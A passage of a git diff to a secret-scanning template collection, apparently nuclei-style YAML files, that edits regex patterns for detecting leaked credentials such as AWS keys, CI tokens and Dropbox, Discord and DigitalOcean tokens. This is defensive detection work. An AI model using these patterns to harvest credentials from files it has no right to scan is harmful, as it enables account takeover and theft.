"(?i)[\"']?claimr[_-]?db[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?claimr[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?user[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?server[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?registry[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?project[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ci[_-]?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?chrome[_-]?refresh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?chrome[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cheverny[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cf[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?certificate[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?censys[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?agent[_-]?instance[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cattle[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cargo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?cache[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bx[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bx[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bundlesize[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?built[_-]?branch[_-]?deploy[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?browserstack[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?browser[_-]?stack[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?brackets[_-]?repo[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pass[_-]?prod[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bluemix[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintraykey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?gpg[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?bintray[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?b2[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?b2[_-]?app[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awscn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awscn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?awsaccesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?ses[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?ses[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?appclientsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']" - - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" # Enhanced by md on 2023/05/04 diff --git a/file/keys/credentials.yaml b/file/keys/credentials.yaml index ec48102411..5e94017b9f 100644 --- a/file/keys/credentials.yaml +++ b/file/keys/credentials.yaml @@ -10,7 +10,6 @@ info: cvss-score: 7.5 cwe-id: CWE-200 tags: token,file,auth - file: - extensions: - all diff --git a/file/keys/databricks-api-token.yaml b/file/keys/databricks-api-token.yaml index aadaf4675a..c2596d9501 100644 --- a/file/keys/databricks-api-token.yaml +++ b/file/keys/databricks-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: databricks,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/datadog-access-token.yaml b/file/keys/datadog-access-token.yaml index 92ffcfdd69..6e408df1dc 100644 --- a/file/keys/datadog-access-token.yaml +++ b/file/keys/datadog-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: datadog,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/digitalocean/digitalocean-access-token.yaml b/file/keys/digitalocean/digitalocean-access-token.yaml index 713e1b0122..7f6f86919f 100644 --- a/file/keys/digitalocean/digitalocean-access-token.yaml +++ b/file/keys/digitalocean/digitalocean-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: digitalocean,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(doo_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(doo_v1_[a-f0-9]{64})\b diff --git a/file/keys/digitalocean/digitalocean-personal-access.yaml b/file/keys/digitalocean/digitalocean-personal-access.yaml index 6065498782..de7fc4f037 100644 --- a/file/keys/digitalocean/digitalocean-personal-access.yaml +++ b/file/keys/digitalocean/digitalocean-personal-access.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: digitalocean,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(dop_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(dop_v1_[a-f0-9]{64})\b diff --git a/file/keys/digitalocean/digitalocean-refresh-token.yaml b/file/keys/digitalocean/digitalocean-refresh-token.yaml index c2c6abaaff..e83de9b0f3 100644 --- a/file/keys/digitalocean/digitalocean-refresh-token.yaml +++ b/file/keys/digitalocean/digitalocean-refresh-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: digitalocean,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)\b(dor_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(dor_v1_[a-f0-9]{64})\b diff --git a/file/keys/discord/discord-api-token.yaml b/file/keys/discord/discord-api-token.yaml index 28568c6541..40c999285d 100644 --- a/file/keys/discord/discord-api-token.yaml +++ b/file/keys/discord/discord-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: discord,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/discord/discord-cilent-secret.yaml b/file/keys/discord/discord-cilent-secret.yaml index 02c90879de..dae644c772 100644 --- a/file/keys/discord/discord-cilent-secret.yaml +++ b/file/keys/discord/discord-cilent-secret.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: discord,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/discord/discord-client-id.yaml b/file/keys/discord/discord-client-id.yaml index 725f8e0f48..ed31506969 100644 --- a/file/keys/discord/discord-client-id.yaml +++ b/file/keys/discord/discord-client-id.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: discord,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/doppler-api-token.yaml b/file/keys/doppler-api-token.yaml index 925537324a..6879135846 100644 --- a/file/keys/doppler-api-token.yaml +++ b/file/keys/doppler-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: doppler,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (dp\.pt\.)(?i)[a-z0-9]{43} \ No newline at end of file + - (dp\.pt\.)(?i)[a-z0-9]{43} diff --git a/file/keys/droneci-access-token.yaml b/file/keys/droneci-access-token.yaml index fb9ede3c62..133c063ec7 100644 --- a/file/keys/droneci-access-token.yaml +++ b/file/keys/droneci-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: droneci,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/dropbox/dropbox-api-token.yaml b/file/keys/dropbox/dropbox-api-token.yaml index 8393139877..a6c4944d0b 100644 --- a/file/keys/dropbox/dropbox-api-token.yaml +++ b/file/keys/dropbox/dropbox-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: dropbox,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/dropbox/dropbox-longlived-token.yaml b/file/keys/dropbox/dropbox-longlived-token.yaml index 7ba943f750..99a8d9416f 100644 --- a/file/keys/dropbox/dropbox-longlived-token.yaml +++ b/file/keys/dropbox/dropbox-longlived-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: dropbox,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/dropbox/dropbox-shortlived-token.yaml b/file/keys/dropbox/dropbox-shortlived-token.yaml index d164b0b3d5..d36f37cc8f 100644 --- a/file/keys/dropbox/dropbox-shortlived-token.yaml +++ b/file/keys/dropbox/dropbox-shortlived-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: dropbox,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/file/keys/duffel-api-token.yaml b/file/keys/duffel-api-token.yaml index c306cef35a..a5654922e3 100644 --- a/file/keys/duffel-api-token.yaml +++ b/file/keys/duffel-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: duffel,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} \ No newline at end of file + - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} diff --git a/file/keys/dynatrace-token.yaml b/file/keys/dynatrace-token.yaml index 474c60ce5d..a036b6bc79 100644 --- a/file/keys/dynatrace-token.yaml +++ b/file/keys/dynatrace-token.yaml @@ -10,7 +10,6 @@ info: cvss-score: 7.5 cwe-id: CWE-200 tags: token,file - file: - extensions: - all diff --git a/file/keys/easypost/easypost-api-token.yaml b/file/keys/easypost/easypost-api-token.yaml index 61013edd56..061a41661f 100644 --- a/file/keys/easypost/easypost-api-token.yaml +++ b/file/keys/easypost/easypost-api-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: easypost,file,token - file: - extensions: - all @@ -19,4 +18,4 @@ file: - type: regex part: body regex: - - EZAK(?i)[a-z0-9]{54} \ No newline at end of file + - EZAK(?i)[a-z0-9]{54} diff --git a/file/keys/easypost/easypost-test-token.yaml b/file/keys/easypost/easypost-test-token.yaml index 13f04d92f6..604b1a06de 100644 --- a/file/keys/easypost/easypost-test-token.yaml +++ b/file/keys/easypost/easypost-test-token.yaml @@ -10,7 